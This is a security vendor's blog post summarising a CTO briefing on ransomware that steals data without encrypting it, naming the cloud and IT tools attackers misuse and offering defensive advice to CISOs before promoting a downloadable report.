In Morphisec’s recent CTO Briefing, The State of Ransomware, CTO Michael Gorelik outlined one of the most concerning shifts in today’s ransomware landscape: a growing number of attacks no longer use encryption at all.
Instead, attackers silently exfiltrate sensitive data—often over weeks or months—and then extort organizations long after the initial compromise. This “ransomware without encryption” approach is expanding quickly because it carries less risk for attackers, is harder for defenders to spot, and is almost impossible for victims to investigate once logs have expired.
A New Kind of Ransomware—Without Encryption
Traditional ransomware depends on encryption. Modern ransomware depends on something far harder to detect. Here’s why:
Stealthy data exfiltration
Minimal malware footprint
Abuse of trusted tools and cloud services
Delayed extortion that frustrates forensic investigation
During the briefing, Michael explained that attackers no longer need loud encryption mechanisms to trigger a crisis. Exfiltration-only attacks remove much of the risk—and complexity—associated with encrypting systems. They also leave defenders unsure about what data was taken, when it happened, or how it occurred.
Here’s why adversaries are moving toward pure exfiltration:
Encryption is noisy; exfiltration can remain silent
EDR tools are stronger at malware prevention than detecting data theft
The extortion still works; victims fear regulatory consequences
Negotiations favor attackers when proof is limited
Organizations can recover systems—but not stolen data
The outcome? Victims still pay—even without encryption—a trend discussed in both the briefing and Morphisec’s blog Why Ransomware Victims Still Pay.
How Modern Exfiltration-Only Attacks Operate
The CTO briefing detailed several real-world techniques recently used against organizations running leading EDR solutions. Many of these intrusions persisted undetected for weeks.
1. Azure Copy Exfiltration
One particularly troubling pattern: attackers increasingly rely on Azure Copy to disguise data theft as routine cloud activity.
Because Azure is widely used for storage and backups, data transfers to Azure endpoints often fail to raise alerts.
Michael noted that across multiple Q3 and Q4 incidents, Azure Copy was the primary exfiltration method—chosen precisely because it blends into normal operations.
This trend is also reflected in Morphisec’s analysis of recent ransomware campaigns.
2. RClone, Mega, and Bitbucket Channels
Attackers commonly leverage:
RClone
MegaNz uploads
Bitbucket repositories
Custom cloud-sync scripts
These tools resemble legitimate backup traffic. Without deep network visibility—which many organizations lack—these transfers go unnoticed.
3. Abuse of Legitimate IT Utilities
Data theft often relies on tools already present in the environment.
Michael highlighted incidents involving:
Advanced IP Scanner
ZenMap
PowerShell
RoboCopy
Portable Node.js modules
Because these utilities are standard in IT operations, they easily blend in. Modern ransomware now depends less on custom malware and more on abusing trusted tools already inside the network.
4. Zero Encryption, Zero Alerts
Without encryption, there is:
No suspicious process activity
No mass file renaming
No CPU spikes
No filesystem triggers
This allows attackers to steal data months before contacting victims—sometimes via email, encrypted messages, or even physical mail, as Michael described.
Why These Attacks Are Especially Dangerous for CISOs
Michael emphasized a difficult reality during the briefing: “When attackers only exfiltrate data, most organizations can’t determine what was stolen—or even if data was stolen at all.”
Forensics become extremely difficult
Logs expire. Cloud activity blends into normal usage. Without encryption events, there’s no clear breach moment.
Organizations can’t disprove attacker claims
Adversaries know this. Fake exfiltration threats are increasing because victims struggle to verify or refute them.
Regulatory exposure remains high
HIPAA, GDPR, PCI-DSS, SEC cyber rules—all focus on data access, not encryption. If data was accessed, disclosure may be required.
Backups provide no real protection
Backups restore systems; they cannot undo leaked data.
In Morphisec’s Why Ransomware Victims Still Pay analysis, reputational damage and compliance risk were key drivers behind ransom payments—even in the absence of encryption.
What CISOs Can Do: Takeaways from the CTO Briefing
Michael shared several practical recommendations:
Shift from detection to preemptive defense — You can’t reliably detect activity that looks normal. Preventing footholds is critical.
Increase visibility into outbound data flows — Especially cloud services and third-party sync tools.
Strengthen identity, MFA, and remote access controls — Many exfiltration attacks begin with a single compromised account.
Validate exfiltration claims before engaging — Bluffing is on the rise. IR teams must confirm evidence before negotiations.
Secure non-agent assets — Gateways, NAS devices, and backup servers are frequent exfiltration launch points.
Exfiltration Is the New Front Line of Ransomware
Encryption may now be optional—but extortion is not.
Attackers have adopted a quieter, more effective model that bypasses traditional detection entirely. By stealing data instead of encrypting systems, ransomware groups lower their risk while increasing leverage over victims.
To see how attackers are shifting to exfiltration-only campaigns—and how preemptive cyber defense can stop them before they start—download Morphisec’s CTO Briefing: The State of Ransomware – Executive Report. The report includes detailed attack-chain analysis, recent case studies, emerging ransomware group tactics, and predictions for 2026.
Comments ( 0 )